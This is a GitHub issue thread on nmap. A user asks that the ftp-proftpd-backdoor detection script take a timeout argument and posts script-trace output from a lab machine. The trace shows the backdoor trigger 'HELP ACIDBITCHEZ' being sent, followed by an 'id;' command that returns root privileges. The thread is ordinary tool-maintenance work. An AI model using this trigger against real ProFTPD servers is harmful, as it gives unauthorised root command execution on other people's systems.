New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Timeout as parameter in ftp-proftpd-backdoor script #1366

Open
alegrey91 opened this Issue Oct 24, 2018 · 3 comments

Comments

Projects
None yet
2 participants
@alegrey91

alegrey91 commented Oct 24, 2018

Hi,
recently I was trying to use the ftp-proftpd-backdoor script.
I found some problems with detection of the backdoor because of the static timeout setted to 5000.
I wrote ~= 3 lines of code to permit the argument passing of the timeout parameter.

@dmiller-nmap

This comment has been minimized.

dmiller-nmap commented Oct 24, 2018

Did the timeout occur during the connect call or after connecting? You can use --script-trace to see the network operations that the script is attempting. Can you provide some output showing what happened so that we can ensure the most robust fix is applied?

Related pull request #1367.

@alegrey91

This comment has been minimized.

alegrey91 commented Oct 25, 2018

That's the output:
$ nmap -sV --script ftp-proftpd-backdoor --script-trace -p 21723 192.168.56.101

NSE: TCP 192.168.56.1:50680 > 192.168.56.101:21723 | CONNECT
NSOCK INFO [5.9560s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 5000ms) EID 18
NSOCK INFO [6.0550s] nsock_trace_handler_callback(): Callback: READ TIMEOUT for EID 18 [192.168.56.101:21723]
NSE: TCP 192.168.56.1:50680 > 192.168.56.101:21723 | CLOSE
NSOCK INFO [6.0560s] nsock_iod_delete(): nsock_iod_delete (IOD #1)
Nmap scan report for 192.168.56.101
Host is up (0.00026s latency).

PORT      STATE SERVICE VERSION
21723/tcp open  ftp     ProFTPD 1.3.3c
Service Info: OS: Unix

That's using my script's review:
$ nmap -sV --script ftp-proftpd-backdoor --script-args timeout=15000 --script-trace -p 21723 192.168.56.101

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-25 09:00 CEST                                                                     [2/132]
NSOCK INFO [5.9480s] nsock_trace_handler_callback(): Callback: CONNECT SUCCESS for EID 8 [192.168.56.101:21723]                             
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | CONNECT                                                                                
NSOCK INFO [5.9480s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 18                                
NSOCK INFO [6.1490s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 18 [192.168.56.101:21723] (75 bytes): 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.101]..
NSE: TCP 192.168.56.1:50774 < 192.168.56.101:21723 | 220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.101]             

NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | 00000000: 48 45 4c 50 20 41 43 49 44 42 49 54 43 48 45 5a HELP ACIDBITCHEZ            
00000010: 0d 0a

NSOCK INFO [6.1490s] nsock_write(): Write request for 18 bytes to IOD #1 EID 27 [192.168.56.101:21723]                                     
NSOCK INFO [6.1490s] nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 27 [192.168.56.101:21723]                             
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | SEND
NSOCK INFO [6.1490s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 34                                
NSOCK INFO [7.6490s] nsock_trace_handler_callback(): Callback: READ TIMEOUT for EID 34 [192.168.56.101:21723]                              
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | 00000000: 69 64 3b 0d 0a                                  id;                         

NSOCK INFO [7.6500s] nsock_write(): Write request for 5 bytes to IOD #1 EID 43 [192.168.56.101:21723]                                      
NSOCK INFO [7.6500s] nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 43 [192.168.56.101:21723]                             
NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | SEND
NSOCK INFO [7.6500s] nsock_read(): Read request from IOD #1 [192.168.56.101:21723] (timeout: 15000ms) EID 50                                
NSOCK INFO [7.6550s] nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 50 [192.168.56.101:21723] (54 bytes): uid=0(root) gid=0(root) groups=0(root),65534(nogroup).
NSE: TCP 192.168.56.1:50774 < 192.168.56.101:21723 | uid=0(root) gid=0(root) groups=0(root),65534(nogroup)                                 

NSE: TCP 192.168.56.1:50774 > 192.168.56.101:21723 | CLOSE
NSOCK INFO [7.6550s] nsock_iod_delete(): nsock_iod_delete (IOD #1)
Nmap scan report for 192.168.56.101
Host is up (0.00029s latency).

PORT      STATE SERVICE VERSION
21723/tcp open  ftp     ProFTPD 1.3.3c
| ftp-proftpd-backdoor:
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
Service Info: OS: Unix
@alegrey91

This comment has been minimized.

alegrey91 commented Nov 4, 2018

Have I to close the issue?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment